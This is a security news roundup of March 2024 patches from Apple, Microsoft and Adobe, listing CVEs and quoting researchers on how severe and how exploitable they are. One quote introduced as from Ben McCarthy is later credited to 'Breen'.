**Apple** and **Microsoft** recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its **Windows OS**. Meanwhile, Apple’s new **macOS Sonoma** addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in **iOS 17.4**, **iPadOS 17.4**, and **iOS 16.7.6**.

Apple’s **macOS** **Sonoma 14.4 Security Update** addresses dozens of security issues. **Jason Kitka**, chief information security officer at **Automox**, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages \[full disclosure: Automox is an advertiser on this site\].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). **Satnam Narang**, senior staff research engineer at **Tenable**, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in **Microsoft Authenticator**, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in **Open Management Infrastructure** (OMI), a Linux-based cloud infrastructure in **Microsoft Azure**. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said **Ben McCarthy,** lead cybersecurity engineer at **Immersive Labs**.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including **Adobe Experience Manager**, **Adobe Premiere Pro**, **ColdFusion 2023** and **2021**, **Adobe Bridge**, **Lightroom**, and **Adobe Animate**. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its **Acrobat** users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

Tag

#linux